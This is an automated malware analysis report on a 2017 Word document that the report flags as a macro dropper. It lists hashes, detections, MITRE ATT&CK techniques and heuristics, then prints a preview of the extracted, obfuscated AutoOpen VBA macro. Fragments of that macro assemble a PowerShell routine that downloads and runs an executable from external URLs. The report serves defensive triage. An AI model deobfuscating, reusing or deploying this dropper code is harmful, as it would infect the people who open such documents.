Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5d828d3833252f0…

MALICIOUS

Office (OLE)

159.5 KB Created: 2017-11-14 05:22:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: 16dad55c07d43a26547a152981441004 SHA-1: 66eac3a4f20add4bb58ef56b9eaf0496f98c1e18 SHA-256: c5d828d3833252f02cbf75de1bff6be56b8141fe6d07d4977b83a00f08a9fc5a
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is configured to execute a command using the Shell() function, indicating it's designed to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6374210-0' further supports this dropper functionality.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6374210-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6374210-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 151373 bytes
SHA-256: bd5883e0d957a8eb8535346569a8d95581db766a08978699507db5957ba55feb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 40 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Nzjshn"
Sub AutoOpen()
ifsEcUi = "REOFdwX" + "jjRDjfR" + "NjroZkY" + "uQmahwC"
Kidhwlflo
OqPTbLa = "YZrqDpu" + "ZZRzaCR" + "wAPDkGX" + "obfvzUV"
End Sub
Function MGfjaVHzV()
RZMsAGabtX = "" + MszcXDD + DuDuztq + woiGajw + cRnLQIj + Mid("tUtacL+acLemacL+acL(ra'+'FacL+acLhuas);bacL+acLreakacL+acL;acL+a5ej+5ejcL}cacL+acLatch{writacL+acLe-host acL+acLrwb8RJ0JqDGXuvLfc0fmJC", 4, 110) + zdAXtbc + iSmXuNT + doKBkQO + RjprYGj
RmECmK = "aKQGvWE" + "QCXFRNT" + "VwijSiw" + "ccKjsSh"
dmWSkEQuX = "zLfVVtD" + "IVQwrPM" + "lmvSCuw" + "jGLGbkz"
LIRIHwKioju = "hGZDDXT" + "rskvUPM" + "aShaPmr" + "qOOqXkN"
TBUsMoGh = "" + LXhijIo + ifMwGrr + LNjmFmY + VCMKmLb + Mid("oB7GDiblacL+ac'+'Lic + 3FfSor35ej+'+'5e'+'jacL+acLJzroikV76w4m3Ajc", 7, 44) + lnXtwvD + qIsBFQp + jhJwjXi + iHFnHWp
HCIMj = "VUUzwMs" + "soFJwnU" + "EnkAWjl" + "UCLCowD"
thHooi = "jSFpZNV" + "nYEIEwr" + "sEonjJi" + "TUnknEA"
iKJuOWtJZf = "SJuIPpM" + "WzUXawQ" + "PjrRmtb" + "zWPEnYM"
BHPwEoSu = "" + UQJKNDn + vSAKYUm + iDcQzYh + OlQduAX + Mid("SAN04bjzuCj2SOcLd = new-acL+acLoba'+'cL+acL5ej+5'+'ejja'+'cL+acLectacL+acL ranac'+'L+acLdom;racL+acLaFac'+'L+acLbcacL+acLd K3XE12LUHkz6tVwhkESkU", 15, 109) + sdfOFtC + zvcLIKW + mlwwBci + vMpjzXF
kYdQa = "ithSCQD" + "pUwTbki" + "IAFqOKc" + "zRjtYsw"
jzrrJQ = "QqhHVwU" + "BusGtTw" + "QCdaszn" + "LkpjNdf"
jiFZUCzaXGG = "bAYiYGY" + "iOMFnKG" + "FMkVqfj" + "PDTfsJE"
fTQwfNSXLEG = "" + QUEpjGX + FOWzvMw + FwfzTYX + ozUUjLs + Mid("VJn0lacL+acLsacL+acLdacL+acL.next(1ac'+'L+acL, 345ej3ikz9zY", 6, 47) + JAdHzbn + zbCdwim + JmVtNwO + cpPEMQc
dWvnQT = "XjVzuiw" + "OspwlJF" + "XdUUqki" + "LwaTPij"
nrFhnLfslft = "KNDkLKc" + "rhdEDpv" + "tjvcnIE" + "MvjWfzM"
bjapbFD = "lujfAPD" + "ilNZwdj" + "vqQnviR" + "SiqcVbw"
ocRwDsw = "" + hCofYQE + TikOuTP + pDfnEMR + ztlNZIt + Mid("8YF4UIuA8w4mqnk9Nj+5e'+'jngacL+acLg'+'.in/acL+ac5ej+5ejLdkacL+acLmHoacL+acLg/3acL+a5ej+5ejcLFf.acL+acLSplacL+acLit(3FacL+ac5ej+5ejLf,3Ff);raFk'+'arapaacL+acLs = racL+acLaacL+acLFn5'+'ej+5ejsadaYH8DKjH9ziLvNO4ak3j5", 18, 176) + qkUqDXz + nnqDhOA + fvwVnWH + WXmnBdi
udwOcEGhOK = "ICRwHKc" + "zPYqvSB" + "PpkXwQT" + "zmrmmmT"
BcowAllTA = "NiDBuPi" + "lYEaDYi" + "jairEFH" + "hCQDMOL"
JjriQfE = "PZMVXJj" + "jUpBDWi" + "QfzuslQ" + "MNvhhMf"
twnHd = "" + pqBidQW + SJUcuDM + RnqzEAh + rTCDIRn + Mid("HAUKOBuR1bbXjMEPX3sjLxacL6YdnbcuO4Hwc0Vkcvr", 20, 6) + sOdnQGX + EjwiPJU + oNYZRmb + QpRuwYw
adQAzEkSG = "WwfUzia" + "vqodzoM" + "GrOprNC" + "GddrfMb"
QuikjctrY = "YMtSiZi" + "iTNPatt" + "XjvTwPK" + "wDFHKvQ"
OhFYmMi = "VBdTWwW" + "ivLPOdY" + "YAZRTJi" + "uhXhzRa"
QoLpJY = "" + kEjllaC + fqqlhbT + FmZhvVG + ArkLLGP + Mid("bJKodBLSYbWUOFiRt+acLbLFacL+acLmacL'+'+acLk/,httacL+acLp://hacL+acLousefoacL+acLrsalelaguacL+acLna.ac5ej+5ejL+acLiacL+'+'acLnfoacL+'+'acL/QuvJacL+acL/,hacL5ej+5ej+ac7i0m4", 18, 148) + cNYmpFz + TwLjAFI + Uhsklwf + JiOaXij
Bddiv = "NwZZUnC" + "cRwsVWm" + "oNAvPzj" + "KrbaHkT"
cEBiCAbrXt = "jKLSWNF" + "zmGjSFr" + "PtrPcsV" + "QNfHkDD"
bikjcdXU = "GzzMCjt" + "HnZwIjo" + "auPwrou" + "zjKfrwS"
GhotPbEFsMT = "" + SRTMjpS + PLtOIJN + pjLkbKG + PMwdvln + Mid("fsKB8kjKBJRPzjrM33iVW+ac5e'+'j+5ejLception.Mes'+'sagacL+acLeacL+acL;acL+acL}acL+acL}acL) -rEpLaCE '+'acLraFacL,[cHaR]36 -rEpLaCErkrSAuu23jtvic", 22, 107) + vjVrnqR + tLfSciQ + zsvujbR + mFlWzAC
lbuIndRzNR = "EUikDiU" + "iYXVSvw" + "VfSwfqQ" + "UDjLKWI"
fPlHmLkfnG = "bjVpqPo" + "rwhYzwU" + "UYZRfVR" + "ZSXRJmk"
GuzfKZBIKz = "RzYtILD" + "oBfbjHd" + "jlajuvz" + "fJuiBqC"
BjFjPCTQHv = "" + tqzNnqh + wlPqkmp + iPHUBXD + HuDCEmc + Mid("0nNEkT8E6uuuwsAH9JzbFrNs5WFf acL+acL+acL+acL acL+acLraac'+'L+acLFkaracL+acLapasacL+acL + a'+'cL+acL3Fac'+'L+acLf.eacL+acLxeacL+a'+'cL5ej+5ej3FacL+a5ej+5ejcLf;foacL+acLracL'+VsSjKH7Yztn", 27, 147) + voJiSIP + DinCMjB + nRmTnHi + PkPQJTm
mmSqwrdhDZA = "wvKjDEB" + "wGLRda
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.